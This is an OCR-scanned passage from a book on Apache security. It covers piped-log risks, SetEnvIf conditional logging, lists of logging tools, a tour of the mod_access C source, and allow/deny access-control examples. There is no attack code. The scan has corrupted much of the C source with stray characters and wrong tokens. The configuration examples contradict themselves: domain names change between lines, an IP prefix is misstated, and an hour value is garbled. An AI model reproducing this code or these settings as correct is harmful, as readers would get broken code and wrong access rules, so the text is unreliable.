that take Apache’s piped strings in as arguments (stored in @ARGV for Perl, for 
example). Those arguments, under certain circumstances, can trigger other 
shell utilities or commands—if you fail to embed the proper filters and tests 
within your script. 


Indeed, as explained in Apache’s documentation: 


Anyone who can write to the directory where Apache is writing a log file can almost certainly 
gain access to the uid that the server is started as, which is normally root. Do NOT give 
people write access to the directory the logs are stored in without being aware of the conse- 
quences; see the security tips document for details. In addition, log files may contain informa- 
tion supplied directly by the client, without escaping. Therefore, it is possible for malicious 
clients to insert control-characters in the log files, so care must be taken in dealing with raw 


logs. 


For pipes, this is even more of an issue. Hence, try to observe wise and careful coding 
practices when designing homegrown programs that process piped logs. For more 
information, see Chapter 12, “Hacking Secure Code: Apache at Server Side.” A 
hacking text file authored by Antifarmer, titled “Hacking Exposed” (not to be 
confused with the excellent book that competes with the Maximum Security titles), 
explains the security significance of piped logs and related issues. Find it at 
http://www. subzion.com/security/text/rooting101.txt. 


NOTE 


Did a bug ever arise in pipes on Apache? You bet, but only in general, not related to log 
piping. Sometime in 2001, an independent researcher found that in version 1.3.14 CGI 
scripts, compiled COM and EXE files, C programs, Fortran programs, and even DOS batch 
files would run from a prompt but wouldn’t execute through a client request. The problem 
was limited to version 1.3.14 on Windows 95, and arose because pipes that handled CGI 
streams neither opened nor closed correctly. The solution was to upgrade. 
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Considering the complexity of piped logs—especially in a security context—you 
might consider other options. For example, suppose you are resorting to piped logs 
merely to filter information from those logs (that is, you don’t want certain strings 
to appear therein). You needn’t use piped logs. Instead, either customize your logs as 
described previously, or use SetEnvIf. 


The SetEnvIf Directive and Conditional Logging 


The SetEnvIf directive defines environment variables based the specified request’s 
attributes or headers. These can be various HTTP request header fields, including 
those defined in RFC 2616. Table 9.8 lists the different header field types. 


TABLE 9.8 HTTP Header Fields 


Header 


Type 





Accept 

Accept -Charset 
Accept -Encoding 
Accept -Language 
Accept -Ranges 
Age 

Allow 
Authorization 
Cache-Control 
Connection 
Content -Encoding 
Content -Language 
Content-Length 
Content-Location 
Content -MD5 
Content -Range 
Content-Type 
Date 

ETag 

Expect 

Expires 
extension-header 
From 

Host 

If -Match 

If -Modified-Since 
If -None -Match 

If -Range 


A request header field 
A request header field 
A request header field 
A request header field 
A response header field 
A response header field 
An entity header field 
A request header field 
A general header field 
A general header field 
An entity header field 
An entity header field 
An entity header field 
An entity header field 
An entity header field 
An entity header field 
An entity header field 
A general header field 
A response header field 
A request header field 
An entity header field 
An entity header field 
A request header field 
A request header field 
A request header field 
A request header field 
A request header field 
A request header field 
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TABLE 9.8 Continued 


Header 


Type 





If -Unmodified-Since 
Last -Modified 
Location 

Max - Forwards 

Pragma 

Proxy -Authenticate 
Proxy -Authorization 
Range 

Referer 

Retry -After 

Server 

TE 

Trailer 

Transfer -Encoding 
Upgrade 

User-Agent 

Vary 

Via 

Warning 
WW-Authenticate 


A request header field 
An entity header field 
A response header field 
A request header field 
A general header field 
A response header field 
A request header field 
A request header field 
A request header field 
A response header field 
A response header field 
A request header field 
A general header field 
A general header field 
A general header field 
A request header field 
A response header field 
A general header field 
A general header field 
A response header field 





Of the aforementioned header field types, SetEnvIf handles the following: 


e Remote_Addr—tThe client’s IP address 


e Remote _Host—tThe client’s hostname (if available) 

e Remote _User—The authenticated username (if available) 

e Request_Method—The method type (GET, POST, PUT, and so on) 
e Request_Protocol—The request’s protocol’s name and version 


e Request_URI—The URL (after the protocol and host portion) 


The syntax is 


SetEnvIf attribute regex envar[=value] 


Here, regex is the regular expression you specify, and envar[=value] represents the 


variable and file type assignment. For example: 


SetEnvIf Request_URI "\.gif$" object_is_image=gif 
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This sets a variable for and identifies GIF files. To filter on this and prevent GIF 
pickups from appearing in your main log—but appear in a special log file just for GIF 
files—tweak CustomLog to do this: 


CustomLog my-gif-request.log common env=gif 


Note that the variable (envar for SetEnvIF and env for CustomLog) must match. That 
is, they must be identical. 


Other Interesting Apache-Related Logging Tools 


The following list points to several unusual and useful Apache-related logging tools, 
including 


e mod_relocate 

e mod_mylog 

e mod_view 

e mod_log mysql 

e parselog 

e Apache -DBILogConfig 
e Apache -DBILogger 
e Apache -DebugInfo 
e Apache -LogFile 

e Apache -ParseLog 
e Apache -Wombat 


e Log-Dispatch 


NOTE 


Some of the URLs in this section are to direct downloads. 





mod_relocate 
Author: Brian Aker 


E-mail: brian@tangent.org 
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URL: http: //www.tangent.org/mod_relocate/ 
Version: 0.5 


Description: Implements an easy way to do log location requests that leave the site. Also 
allows a trigger to be called when this occurs. 


mod_mylog 
Author: Michael Link 
E-mail: mlink@fractal.net 
Requires: Apache 2.0, MySQL 
URL: http: //modmylog.sourceforge.net/ 
Version: 1.6 


Description: Logs put into a MySQL database. This enables you to perform deep analysis of 
your logs with just a few lines of SQL code (as opposed to writing extensive lexical scanning 
tools in Perl, sed, or awk). 


mod_view 
Author: Anthony Howe 
E-mail: achowe@snert.com 
Requires: N/A 
URL: http://www. snert.com/Software/mod_view/ 
Version: 1.0 


Description: Allows for the display of the head, tail, or entire contents of a static file. Ideal for 
remotely viewing log files. As always, however, closely examine the code to determine that no 
security holes exist (which could conceivably allow remote users to pull data from your logs, 


or worse, from other plain text files containing sensitive data). 


mod_log_ mysql 
Author: Chris Powell 
E-mail: chris@grubbybaby.com 
Requires: Apache 
URL: http: //www.grubbybaby.com/mod_log_mysq1/ 
Version: 1.09 


Description: Gives Apache the capability of logging access-log entries to a MySQL database. 
Perfect for Web clusters and for SQL flexibility. 
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parselog 
Author: Mark A. Bentley 
E-mail: bentlema@cs.umn.edu 
Requires: Perl5 
URL: http: //www.cs.umn.edu/~bentlema/projects 


Version: 1.0beta 


Description: This is a Perl script to parse and store logs by server and date. 


Apache -DBILogConfig 
Author: Jason Bodnar 
E-mail: j ason@shakabuku.org 
Package Contents: Apache: :DBILogConfig 
URL: http: //www.cpan.org/authors/id/J/JB/JBODNAR/Apache -DBILogConfig-0.02.tar.gz. 


Description: Logs access information in a DBI database. 


Apache -DBILogger 
Author: Ask Bjorn Hansen 
E-mail: ask-cpan@perl.org 
Package Contents: Apache: :DBILogger 
URL: http: //www.cpan.org/authors/id/ABH/Apache -DBILogger -0.93.tar.gz. 


Description: Tracks what's being transferred in a DBI database. 


Apache -DebugInfo 
Author: Geoffrey Young 
E-mail: geoff@cpan.org 
Package Contents: Apache: :DebugInfo 
URL: http: //www.cpan.org/authors/id/G/GE/GEOFF/Apache -DebugInfo-0.05.tar.gz. 


Description: Logs various bits of per-request data. 
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Apache -LogFile 
Author: Doug MacEachern 
E-mail: dougm@pobox.com 
Package Contents: Apache: :LogFile 
Apache: :LogFile: :Config. 
URL: http: //www.cpan.org/authors/id/DOUGM/Apache -LogFile-0.12.tar.gz. 


Description: Interface to Apache's logging routines. 


Apache -ParseLog 
Author: Akira Hangai 
E-mail: akira@hangai.net 
Package Contents: Apache: :ParseLog 
URL: http: //www.cpan.org/authors/id/A/AK/AKIRA/Apache -ParseLog-1.02.tar.gz. 


Description: Object-oriented Perl extension for parsing Apache log files. 


Apache -Wombat 
Author: Brian Moseley 
E-mail: ix@maz.org 
Package Contents: Apache: :Wombat 
URL: http: //www.cpan.org/authors/id/I/1IX/1IX/Apache -Wombat-0.5.1.tar.gz. 


Description: Embeds Wombat within an Apache/mod_perl server, 

Apache: :Wombat : : Connector—Apache/mod_perl connector; 

Apache: :Wombat: :FileLogger—Apache file logger class; Apache: :Wombat : : Logger—Apache 
server logger class; Apache: :Wombat: :Request—Apache connector request class; 


Apache: :Wombat : :Response—Apache connector response class. 


Log-Dispatch 
Author: Dave Rolsky 
E-mail: autarch@urth.org 
Package Contents: Apache: :Log objects. 


URL: http: //www.cpan.org/authors/id/D/DR/DROLSKY/Log-Dispatch-1.80.tar.gz. 


Other Interesting Logging Tools Not Specific to Apache 197 


Other Interesting Logging Tools Not Specific to Apache 


Finally, this section covers several interesting and useful logging and audit tools that 
don’t ship with Apache, but are useful, especially on Unix. Table 9.9 lists them. 


TABLE 9.9 Tools to Enhance Your Logging Security 





Tool Description and Location 

ippl ipp1 is a multi-threaded tool that logs incoming IP packets. You can establish 
rules for which packet types you'd like to filter. Location: 
http: //ww.via.ecp.fr/~hugo/ippl/. 

Logcheck Logcheck is one component of the Abacus Project. Logcheck processes logs 
generated by the Abacus Project tools, system daemons, TCP Wrapper, 
logdaemon, and the TIS Firewall Toolkit. Location: 
http: //www.psionic.com/abacus/logcheck/. 

LogWatch LogWatch analyzes your logs for a user-specified time period and generates 
customizable reports. Location: 
http://www. kaybee.org/~kirk/html/linux.html. 

netlog netlog is a collection of network monitoring and logging utilities 
(tcplogger, udplogger, netwatch, and extract). netlog can log all TCP 
connections and UDP sessions on a subnet and provide real-time monitoring 
and reporting. Location: 
http://net.tamu.edu/ftp/security/TAMU/netlog.README. 

PIKT PIKT is the Problem Informant/Killer Tool. PIKT monitors multiple worksta- 


Secure Syslog 


tions for problems, and if appropriate, automatically fixes those problems. 
Sample problems include disk failures, log failures, queue overflows, erro- 
neous or suspicious permission changes, and so forth. Location: 

http: //pikt.uchicago.edu/pikt/. 

Secure Syslog is a new cryptographically secure system-logging tool. 
Designed to replace the syslog daemon, Secure Syslog implements a crypto- 
graphic protocol called PEO-1 that allows the remote auditing of system logs. 
Auditing remains possible even if an intruder gains superuser privileges in the 
system. Location: http: //www.core-sdi.com/Core-SDI/english/slog- 
ging/ssyslog.html. 





Also, there are several useful utilities that borderline on being both intrusion detec- 
tion and logging analysis systems, including the following: 


e SWATCH (The System Watcher) 


e Watcher 


e NOCOL/NetConsole v4.0 


e PingLogger 
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e LogSurfer 
e Netlog 
e Analog 


SWATCH (The System Watcher) 
Author: Stephen E. Hansen and E. Todd Atkins 
Platform: Unix (Perl is required) 


Location: ftp: //coast.cs.purdue.edu/pub/tools/unix/swatch/ 


The authors wrote SWATCH to supplement the logging capabilities of out-of-the-box 
Unix systems. SWATCH, consequently, has logging capabilities that far exceed your 
run-of-the-mill syslog. SWATCH provides real-time monitoring, logging, and report- 
ing. And, because SWATCH is written in Perl, it’s both portable and extensible. 


SWATCH has several unique features, including 


e A “backfinger” utility that attempts to grab finger information from the attack- 
ing host 


e Support for instant paging, so you can receive up-to-the-minute reports 


e Conditional execution of commands (if this condition is found in a log file, do 
this) 


Lastly, SWATCH relies on local configuration files. Conveniently, multiple configura- 
tion files can exist on the same machine. Therefore, although originally intended 
only for system administrators, any local user with adequate privileges can use 
SWATCH. 


Watcher 
Author: Kenneth Ingham 
E-mail: ingham@i-pi.com 


URL: http: //www.i-pi.com/ 


Ingham developed Watcher while at the University of New Mexico Computing 
Center. He explains that at the time, the Computing Center was expanding. As a 
result, the logging process they were then using was no longer adequate. Therefore, 
Ingham was looking for a way to automate scanning of logs. Watcher was the result 
of his labors. 
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Watcher analyzes various logs and processes, looking for radically abnormal activity. 
The author sufficiently fine-tuned this process so that Watcher can interpret the 
widely variable output of commands, like ps, without setting off alarms. Watcher 
runs on Unix systems and requires a C compiler. 


NOCOL/NetConsole v4.0 


Location: ftp: //ftp.navya.com/pub/vikas/nocol.tar.gz 


NOCOL/NetConsole v4.0 is a suite of standalone applications that performs a wide 
variety of monitoring tasks. This suite offers a Curses interface, which is great for 
running on a wide range of terminals (it does not require The X Window System to 
work). It is extensible, has support for a Perl interface, and operates on networks 
running AppleTalk and Novell. 


PingLogger 
Author: Jeff Thompson 


Location: http: //ryanspc.com/tools/pinglogger.tar.gz 


PingLogger logs ICMP packets to an outfile. Using this utility, you can reliably deter- 
mine who is ping flooding you. The utility was originally written and tested on 
Linux (it requires a C compiler and IP header files), but may work on other Unix 
systems. 


LogSurfer 
Author: University of Hamburg, Department of Computer Science 


Location: ftp://ftp.cert.dfn.de/pub/tools/audit/logsurfer/logsurfer-1.41.tar.gz 


LogSurfer is a comprehensive log analysis tool. The program examines plain text log 
files, and based on what it finds and the rules you provide, it can perform various 
actions. These might include creating an alert, executing an external program, or 
even taking portions of the log data and feeding that to external commands or 
processes. LogSurfer requires C. 


Netlog 


Location: ftp://coast.cs.purdue.edu/pub/tools/unix/TAMU/ 


Developed at Texas A&M University, Netlog can log all TCP and UDP traffic. This 
tool also supports the logging of ICMP messages, although the developers report that 
performing this logging activity soaks up a great deal of storage. To use this product, 
you must have a C compiler. 
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Analog 
Author: Stephen Turner, University of Cambridge Statistical Laboratory 


URL: http: //www.statslab.cam.ac.uk/~sret1/analog/ 


Analog is a truly cross-platform log file analyzer. In addition to Linux, Analog 
currently runs on the following operating systems: 


e Macintosh 

e OS/2 

e Windows 95/NT 
e Vax/VMS 

e RiscOS 

e BeOS 
BS2000/OSD 


Analog also has built-in support for a wide variety of languages, including English, 
Portuguese, French, German, Swedish, Czech, Slovak, Slovene, Romanian, and 
Hungarian. 


And, as if that weren’t enough, Analog also does reverse DNS lookups (slowly), has a 
built-in scripting language (similar to the shell languages), and has at least minimal 
support for AppleScript. 


Finally, Analog supports most of the well-known Web server log formats, including 
Apache, NCSA, WebStar, IIS, W3 Extended, Netscape, and Netpresenz. For these 
reasons, Analog is a good tool to have around, especially in heterogeneous networks. 


Summary 


Apache has excellent logging facilities, and you can customize these to a significant 
degree. You must decide what, when, where, how, and to what degree Apache logs 
traffic. 


PART IV 


Runtime Apache 
Security 


IN THIS PART 


10 Apache Network Access Control 
11 Apache and Authentication: Who Goes There? 
12 Hacking Secure Code: Apache at Server Side 


13 Hacking Secure Code: Apache at Client Side 





10 


Apache Network Access 
Control 


We servers remain available 24/7, and anyone can 
connect to your directories and peruse your content. To 
forestall this, Apache’s development team incorporated 
various access controls. This chapter examines Apache’s 
network-based access control. 


What Is Network Access Control? 


Network access control is the ability to incisively allow or 
deny users access to local network resources. When most 
folks think of network access control, they think in terms 
of firewalls, routers, switches, and packet filters that 
provide such controls. However, some applications can 
also provide additional access control layers. Luckily, 
Apache is one such application. 


You can instruct Apache to enforce various controls, 
including the following: 


e Exclusionary models based on IP address, domain, or 
hostname 


e Exclusionary models based on time or geographical 
origin 

e Inclusionary models based on IP address, domain, or 
hostname 

e Inclusionary models based on time or geographical 
origin 


e Conditional access based on the client 


Apache achieves this through mod_access, which you'll 
find in httpd-release/modules/aaa as mod_access.c. 


IN THIS CHAPTER 


e What Is Network Access 
Control? 


e How Apache Handles 
Network Access Control: 
Introducing mod_access 


e Using Network Access 
Control in Apache 
(httpd.conf) 


e Virtual Hosts and Network 
Access Control 
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How Apache Handles Network Access Control: 
Introducing mod_access 


mod_access isn’t a gee-I-might-like-to-have-this module. Unless you specify other- 
wise by applying custom compilation options, Apache includes mod_access and 
compiles it in by default. 


mod_access.c is compact, efficient and, at least in Apache 2.0.28, consists of only 
346 lines before includes. In these 346 lines, mod_access establishes a network access 
control mechanism that approaches basic firewalling functionality. This is particu- 
larly useful, too, because on several platforms on which Apache runs, operating 
system-based network access control is nonexistent. 


A Brief mod_access Tour 

mod_access employs several functions, internal functions, and data type declarations 
and structures that taken together, perform the relevant work in evaluating, grant- 
ing, and denying access: 


e allowdeny_type 

e create_access_ dir_config() 
e order() 

e allow_cmd() 

e in_domain() 

e find_allowdeny() 


e check_dir_access() 


allowdeny_type 

allowdeny_type is an enumerated data type. It sets the ground rules for the data 
types to be used in find_allowdeny() and the allowdeny structure therein, and 
eventually in a switch block that returns status depending on how it resolves 
allowdeny types: 


enum allowdeny_type { 
T_ENV, 
TALL, 
T_IP, 
T_HOST, 
T_FAIL 
J; 
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create_access_dir_config() 
create_access_dir_config() establishes and returns an access_dir_conf object: 


static void *create_access dir_config(apr_pool_ t *p, char *dummy) 
{ 
int i; 
access dir_conf *conf = 
(access _dir_conf *)apr_pcalloc(p, sizeof(access_dir_conf)); 


for (i = 0; i < METHODS; ++i) { 
conf->order[i] = DENY THEN ALLOW; 
} 
conf ->allows = apr_array_make(p, 1, sizeof (allowdeny) ) ; 
conf ->denys = apr_array_make(p, 1, sizeof(allowdeny)); 


return (void *)conf; 


order() 

order() establishes an array to anchor different values, depending on the rules you 
establish. It does this via strcasecmp(), a <string.h> routine that performs non-case 
sensitive string comparisons: 


static const char *order(cmd_parms *cmd, void *dv, const char *arg) 
{ 

access dir_conf *d = (access _dir_conf *) dv; 

int i, 0; 


if (!strcasecmp(arg, "allow,deny")) 

o = ALLOW _THEN DENY; 

else if (!strcasecmp(arg, "deny,allow") ) 

o = DENY _THEN ALLOW; 

else if (!strcasecmp(arg, "mutual-failure") ) 
o = MUTUAL_FAILURE; 

else 

return "unknown order"; 


for (i = 0; i < METHODS; ++i) 
if (cmd->limited & (AP_METHOD BIT << i)) 


d->order[i] = 0; 


return NULL; 
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NOTE 
Although string case sensitivity is generally not an issue, rare configurations on some operat- 


ing systems can affect your access controls, as we'll discuss in Chapter 11, “Apache and 
Authentication: Who Goes There?” 


allow_cmd() 

order() determines what order you've specified, but the order is only the leading 
rule you apply, and merely tells mod_access and Apache in what order to evaluate 
your controls. allow_cmd() checks to ensure that you didn’t mangle the trailing 
criterion. 


static const char *allow_cmd(cmd_parms *cmd, 
void *dv, const char *from, 
const char *where_c) 


access dir_conf *d = (access _dir_conf *) dv; 
allowdeny *a; 

char *where = apr_pstrdup(cmd->pool, where_c); 
char *s; 

char msgbuf [120]; 

apr_status_t rv; 


if (strcasecmp(from, "from")) 
return "allow and deny must be followed by 'from'"; 


a = (allowdeny *) apr_array_push(cmd->info ? d->allows : d->denys); 
a->x.from = where; 
a->limited = cmd->limited; 


if (!strncasecmp(where, "“env=", 4)) { 
a->type = T_ENV; 
a->x.from += 4; 
} 
else if (!strcasecmp(where, "all")) { 
a->type = T_ALL; 
} 
else if ((s = strchr(where, '/'))) { 
*stt = '\0'; 
rv = apr_ipsubnet_create(&a->x.ip, where, s, cmd->pool); 
if (APR_STATUS IS EINVAL(rv)) { 
/* looked nothing like an IP address */ 
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return "An IP address was expected"; 
} 
else if (rv != APR_SUCCESS) { 
apr_strerror(rv, msgbuf, sizeof msgbuf) ; 
return apr_pstrdup(cmd->pool, msgbuf) ; 
} 
a->type = T_IP; 
} 
else if (!APR_STATUS_IS_EINVAL(rv = apr_ipsubnet_create 
»(&a->x.ip, where, NULL, cmd->pool))) { 
if (rv != APR_SUCCESS) { 
apr_strerror(rv, msgbuf, sizeof msgbuf) ; 
return apr_pstrdup(cmd->pool, msgbuf) ; 
} 
a->type = T_IP; 
} 
else { /* no slash, didn't look like an 
IP address => must be a host */ 
a->type = T_HOST; 
} 
return NULL; 
} 


NOTE 


allow_cmd() essentially checks for typographical errors in your rules. For example, if you start 
a rule with allow, you must follow it with a directional (from) and some value (typically, an 
address or address mask). 





in_domain() 
in_domain() makes further checks, ensuring that if you specified a domain name, it 
matched the entire string (or at least, a fully articulated portion thereof): 


static int in_domain(const char *domain, const char *what) 
{ 

int dl = strlen(domain) ; 

int wl = strlen(what) ; 


if ((wl—dl) >= 0) { 
if (strcasecmp(domain, &what[wl—dl]) != 0) 
return 0; 
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/* Make sure we matched an *entire* subdomain -- - 
=» if the user said ‘allow from good.com', 

we don't want people from nogood.com to be able 
to get in. */ 


if (wl == dl) 
return 1; /* matched whole thing */ 
else 
return (domain[0] == '.' || what{wl—dl—1] == '.'); 
} 
else 
return 0; 


find_allowdeny() 

find_allowdeny() walks an array checking various allow/deny objects and sends 
these through a switch block, checking member type properties (that is, is this an IP 
address, a host, ALL, none, or an environment variable?): 


static int find_allowdeny(request_rec *r, 
apr_array_header_t *a, int method) 


allowdeny *ap = (allowdeny *) a->elts; 
apr_int64_t mmask = (AP_METHOD_BIT << method); 
int i; 

int gothost = 0; 

const char *remotehost = NULL; 


for (i = 0; i < a->nelts; ++i) { 
if (!(mmask & ap[i].limited) ) 
continue; 


switch (ap[i].type) { 
case T_ENV: 
if (apr_table get(r->subprocess env, ap[i].x.from)) { 
return 1; 


} 


break; 


case T_ALL: 
return 1; 
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case T_IP: 
if (apr_ipsubnet_test(ap[i].x.ip, r->connection->remote_addr)) { 
return 1; 


} 


break; 


case T_HOST: 
if (!gothost) { 
int remotehost_is_ip; 
remotehost = ap_get_remote_host(r->connection, 
=»r->per_dir_config, 
REMOTE _DOUBLE_REV, &remotehost_is ip); 


if ((remotehost == NULL) || remotehost_is_ ip) 
gothost = 1; 
else 
gothost = 2; 
} 


if ((gothost == 2) && in_domain(ap[i].x.from, remotehost) ) 
return 1; 
break; 


case T_FAIL: 
/* do nothing? */ 
break; 
} 
} 


return Q; 


} 


check_dir_access 

mod_access’s big enchilada is check_dir_access(). When Apache calls mod_access, 
check_dir_access() begins the evaluation process. First, it gets the module’s 
per-directory configuration information: 


static int check_dir_access(request_rec *r) 

{ 

int method = r->method_number; 

int ret = OK; 

access _dir_conf *a = (access_dir_conf *) 
ap_get_module_config(r->per_dir_config, &access_module) ; 
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Next, it determines the order scheme you specified on how to test access privileges. 
We'll later examine those schemes in detail, but for now, they are 


e allow, deny 
e deny, allow 


e mutual-failure 


check_dir_access tries all three in succession: 


if (a->order[method] == ALLOW_THEN DENY) { 
ret = HTTP_FORBIDDEN; 
if (find_allowdeny(r, a->allows, method) ) 
ret = OK; 
if (find_allowdeny(r, a->denys, method) ) 
ret = HTTP_FORBIDDEN; 
} 
else if (a->order[method] == DENY_THEN ALLOW) { 
if (find_allowdeny(r, a->denys, method) ) 
ret = HTTP_FORBIDDEN; 
if (find_allowdeny(r, a->allows, method) ) 
ret = OK; 
} 
else { 
if (find_allowdeny(r, a->allows, method) 
&& !find_allowdeny(r, a->denys, method) ) 
ret = OK; 
else 
ret = HTTP_FORBIDDEN; 


Finally, it checks for Satisfy declarations, which apply in situations where you 
restrict access both by network and username/password: 


if (ret == HTTP_FORBIDDEN 

&& (ap_satisfies(r) != SATISFY_ANY || !ap_some_auth_required(r))) { 
ap_log rerror(APLOG MARK, APLOG_NOERRNO|APLOG ERR, 0, r, 

"client denied by server configuration: %s", 

r->filename) ; 


} 
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NOTE 


We'll discuss username/password authentication in Chapter 11. 
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Historically, Apache separated the access control file (access. conf) from the main 
httpd configuration file (httpd.conf). That is no longer true, as evidenced by the 
default access.conf’s contents: 


## access.conf -- Apache HTTP server configuration file 


This is the default file for the 
AccessConfig directive in httpd.conf. 
It is processed after httpd.conf and srm.conf. 


To avoid confusion, it is recommended that you 
put all of your Apache server directives into 
the httpd.conf file and leave this 

one essentially empty. 


E HR eH HR HH HK HH HK 


Depending on your Apache distribution (or if you changed the defaults), your 
httpd.conf file could theoretically live anywhere. In version 1.3, it was in 
/etc/http/conf/httpd.conf. In version 2.0, Apache ships with httpd.conf alone, 
and access.conf and srm.conf no longer exist. 


Here’s a typical <Directory> block for DocumentRoot; in this case, it’s located in 
/home/httpd/html 


<Directory "/home/httpd/html"> 

This may also be "None", "All", or 

any combination of "Indexes", 
"Includes", "FollowSymLinks", "ExecCGI", 
or "MultiViews". 


Note that "MultiViews" must be named 
*explicitly* --- "Options All" 
doesn't give it to you. 


E E # He HH HK HK H 


Options None 
# 
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AllowOverride All 

# 

# Controls who can get stuff from this server. 
# 

Order deny,allow 

Allow from all 

# Deny from all 

</Directory> 


The directives offer three avenues of control: 


e allow—The allow directive controls which hosts (if any) can connect, and 
offers you three choices: a11, none, or list, where list is a list of approved 
hosts. 


e deny—tThe deny directive controls which hosts (if any) cannot connect, and 
offers you three choices: a11, none, or list (again, list is a list of unapproved 
hosts). 


e order—tThe order directive controls the order in which the allow/deny rules 
are applied and offers three choices: allow, deny; deny, allow; or mutual- 
failure. (mutual-failure is a special option that specifies that a connection 
must pass both allow and deny rules.) 


Using these directives in concert, you can apply access control in several ways: 
e Inclusively—You explicitly name all authorized hosts 
e Exclusively—You explicitly name all unauthorized hosts 


e Inclusively and exclusively—You mix and match 
Let’s look at a few examples. 


Inclusive Screening: Explicitly Allowing Authorized Hosts 


Suppose your host is linux1.mydom.net, and you want to restrict all outside traffic. 
Your access control section might look like this: 


order deny, allow 
allow from linux1.nycom.net 
deny from all 


Here, on evaluation of a connect request, the server first processes denials and rejects 
everyone. Next, it checks for approved hosts and finds linux1.mycom.net. In this 
scenario, only connection requests from linux1.mycom.net are allowed. 
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Of course, the preceding scenario is a bit too restrictive. Chances are, you'd like to 
allow at least a few machines in your domain to connect. If so, you could make rules 
slightly more liberal, using a host list, like this: 


order deny, allow 
allow from linux1.mydom.net linux2.mydom.net linux3.mydom.net 
deny from all 


In this new scenario, not only can linux1.mycom.net connect, but linux2.mycom.net 
and linux3.mycom.net can, too. However, other machines in your domain are left 
out in the cold. (For example, the server will reject connections from 
fiji.mycom.net and hawaii.mycom.net.) 


Or, perhaps you aim to allow all connections initiated from your domain (and reject 
only those coming from foreign networks). To do so, you could configure the access 
control directives like this: 


order deny, allow 
allow from mydom.net 
deny from all 


Here, any machine in the mydom.net domain can connect. When possible though, 
use IP addresses (not hostnames) to designate hosts and networks. This method is a 
tad more stringent and guards against mistakes. 


Here’s an example that limits connections to those initiated by the host 
www.pacificnet.net: 


order deny, allow 
allow from 207.171.0.253 
deny from all 


And here’s a more general rule set that limits connections to those initiated from 
Pacificnet’s network, through their lead router coming out of Qwest: 


order deny, allow 
allow from 65.112.160.42 
deny from all 


But these are inclusive schemes, where you explicitly name all hosts or networks that 
can connect. You need not rely on inclusive schemes alone. You can also use exclu- 
sive schemes to screen out just one or a few hosts using the deny directive. 
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Exclusive Screening: Explicitly Blocking Unwanted Hosts 


Suppose you wanted to block connections from hackers.annoying.net, but still 
allow connections from everyone else. You might set up your directives like this: 


order deny, allow 
allow from all 
deny from hackers.annoying.net 


This would block hackers.annoying.net only and grant other hosts open access. Of 
course, this would probably be an unrealistic approach in practice. The folks on 
hackers likely also have accounts on other machines within annoying.net. 
Therefore, you might be forced to block the entire domain, like this: 


order deny, allow 
allow from all 
deny from annoying.net 


This would block any host coming from annoying.net. And, if you later encountered 
problems from users on hackers from still other domains, you could simply add the 
new “bad” domains to the list, like this: 


order allow, deny 
allow from all 
deny from annoying.net hackers.really-annoying.net hackers. knuckleheads.net 


But things aren’t always that cut and dried. Sometimes, you need to limit access to a 
single domain and even refuse connections from machines within it. For this, you 
must use the mutual-failure option. 


The mutual-failure Option: Mix and Match 


Suppose that you’re running Apache in an intranet environment where your main 
network is ourcompany.net. Your aim is to provide Web access to all hosts except 
accounts.ourcompany.net and shipping.ourcompany.net. The easiest way is to 
establish a rule set like this: 


order mutual-failure 
allow from ourcompany.net 
deny from accounts.ourcompany.net shipping.ourcompany.net 


The mutual-failure directive forces tests wherein incoming hosts must meet both 
allow and deny rules. Here, all hosts in ourcompany.net except accounts and ship- 
ping are granted access. 
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In summation, the allow and deny directives offer you several ways to allow or deny 
access by address: 


e Full IP addresses (165.193.123.117) 

e Network CIDR designations (10.1.0.0/16) 

e Network-netmask pairs (10.1.0.0/255.255.0.0) 
e Partial domain names (samspublishing.com) 


e Partial IP addresses (165.193.123 or 165.193) 


For example, consider this code: 


Deny from 64.133 


This will deny all hosts carrying IP addresses of 164.133.x.x. Or this: 

Deny from 64.133.78 

This will block all hosts with IP addresses of 64.133.78. Or, to block a single 
machine: 


Deny from 64.133.78.10 


This will block the host with IP address 64.133.78.10. 


NOTE 


Note that while IP and hostname-based screening defeat average attackers, spoofing utilities 
can defeat such access control mechanisms. These utilities (like Mendax) enable an attacker to 
present his machine as another and thus gain authorization. For more information, see this 
page: http://www. linuxgazette.com/issue63/sharma. html 





However, they also provide one additional method, a method that invites endless 
possibilities: the power to allow or deny based on environment variables. 


Access Control Based on Environment Variables 

When used with another directive, SetEnvIF, allow and deny let you selectively 
grant or refuse access to remote clients based not merely on their browser, but other 
environment variables and header fields. 


Table 10.1 lists environment variables and request header fields that allow, deny, and 
SetEnvIF deal with. 
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TABLE 10.1 Variables and Request Headers SetEnvIF Supports 


Variable or Header 


Value 





Accept 

Accept -Charset 
Accept -Encoding 
Accept -Language 
Authorization 
Expect 

From 

Host 

HTTP_ACCEPT 
HTTP_COOKIE 
HTTP_FORWARDED 
HTTP_REFERER 
HTTP_USER_AGENT 
If -Match 

If -Modified-Since 
If -None -Match 

If -Range 

If -Unmodified-Since 
Max -Forward 
Proxy -Authorization 
QUERY_STRING 
Range 

Referer 
REMOTE_ADDR 
REMOTE_HOST 
REMOTE_IDENT 
REMOTE_USER 
REQUEST_FILENAME 
REQUEST_METHOD 
REQUEST_PROTOCOL 
REQUEST_URI 
SCRIPT_FILENAME 
TE 

THE_REQUEST 
TIME 

TIME_DAY 
TIME_HOUR 
TIME_MIN 
TIME_MON 
TIME_SEC 





(Request Header) 

(Request Header) 

(Request Header) 

(Request Header) 

(Request Header) 

(Request Header) 

(Request Header) 

(Request Header) 

Stores the types the client will accept 
Stores the cookie sent by the remote client 
Stores a proxy connection’s origin 

Stores the referring document's URL 
Stores the client software identification 
(Request Header) 

(Request Header) 

(Request Header) 

(Request Header) 

(Request Header) 

(Request Header) 

(Request Header) 

Stores the client’s raw query string 
(Request Header) 

(Request Header) 

Stores the client’s IP address 

Stores the client’s host name 

Stores the remote user name (if available) 
Stores the user name for authentication 
Stores the requested resource’s local path 
Stores the client's HTTP request method 
Stores the client’s request protocol 
Stores the HTTP requested URI 

Stores the requested resource’s local path 
(Request Header) 

Stores the client's full HTTP request line 
Stores the time in a formatted string 
Stores the current date 

Stores the current hour (0-23) 

Stores the current minute (0-59) 

Stores the current month (0-11) 

Stores the current second (0-59) 
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TABLE 10.1 Continued 





Variable or Header Value 

TIME_WDAY Stores the current weekday (0-6) 
TIME_YEAR Stores the current year (XXXX) 
User -Agent (Request Header) 


Blocking Access Based on Hour, Day, or Month 
To restrict access by time, you must use allow, deny, and SetEnvIf in concert, like 
this: 


SetEnvIf TIME_HOUR @ punctual 
<Directory /docs> 

Order Deny,Allow 

Deny from all 

Allow from env=punctual 
</Directory> 


The preceding code sets a series of conditions and triggers access based on them as 
follows: 


e Check the time to ensure that it’s noon (SetEnvIf TIME _HOUR 12) 
